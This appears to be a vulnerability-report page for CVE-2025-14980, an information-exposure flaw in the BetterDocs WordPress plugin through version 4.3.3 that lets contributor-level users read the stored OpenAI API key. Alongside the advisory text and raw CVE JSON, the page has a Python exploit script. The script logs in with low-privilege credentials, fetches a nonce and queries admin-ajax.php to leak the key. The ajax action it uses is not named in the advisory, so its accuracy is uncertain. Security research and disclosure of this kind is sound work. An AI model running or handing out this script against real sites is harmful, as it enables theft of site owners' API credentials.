Security Vulnerability Report
CVE-2025-14980 CVSS 6.5 MEDIUM

CVE-2025-14980

Published: 2026-01-09 07:16:02
Last Modified: 2026-04-15 00:35:42

Description

The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive data including the OpenAI API key stored in plugin settings.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BetterDocs WordPress Plugin < 4.3.4 (all versions up to 4.3.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
from bs4 import BeautifulSoup

# CVE-2025-14980 PoC - BetterDocs Plugin Sensitive Information Exposure
# Authenticated attackers with contributor-level access can extract OpenAI API keys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"
USERNAME = "contributor"  # Low-privilege account
PASSWORD = "password"


def get_nonce(sess, url):
    """Extract WordPress nonce for authenticated requests"""
    resp = sess.get(f"{url}/wp-admin/admin.php?page=betterdocs-settings")
    soup = BeautifulSoup(resp.text, 'html.parser')
    nonce_elem = soup.find('input', {'id': '_wpnonce'})
    if nonce_elem:
        return nonce_elem.get('value')
    return None


def exploit():
    """Exploit the scripts() function to extract sensitive data"""
    sess = requests.Session()

    # Step 1: Authenticate with WordPress
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    sess.post(f"{TARGET_URL}/wp-login.php", data=login_data)

    # Step 2: Get nonce for the request
    nonce = get_nonce(sess, TARGET_URL)
    if not nonce:
        print("[-] Failed to obtain nonce")
        return

    # Step 3: Trigger scripts() function to leak settings
    # This exploits the unprotected endpoint in BetterDocs < 4.3.4
    exploit_data = {
        'action': 'betterdocs_get_settings',
        '_wpnonce': nonce
    }
    response = sess.post(
        f"{TARGET_URL}/wp-admin/admin-ajax.php",
        data=exploit_data
    )

    # Step 4: Parse response for sensitive data
    if response.status_code == 200:
        data = response.json()
        if 'openai_api_key' in str(data):
            print("[+] OpenAI API Key leaked!")
            print(response.text)
        else:
            print("[-] No sensitive data in response")
    else:
        print(f"[-] Request failed with status: {response.status_code}")


if __name__ == "__main__":
    print("[*] CVE-2025-14980 BetterDocs Sensitive Info Exposure PoC")
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14980", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:01.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive data including the OpenAI API key stored in plugin settings."}, {"lang": "es", "value": "El plugin BetterDocs para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 4.3.3, inclusive, a través de la función scripts(). Esto permite a atacantes autenticados, con acceso de nivel de colaborador o superior, extraer datos sensibles, incluyendo la clave API de OpenAI almacenada en la configuración del plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3430424%40betterdocs%2Ftags%2F4.3.4&old=3422660%40betterdocs%2Ftrunk", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-14980/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1595f231-d300-484a-a0e1-1e2bc7b82ed3?source=cve", 
"source": "[email protected]"}]}}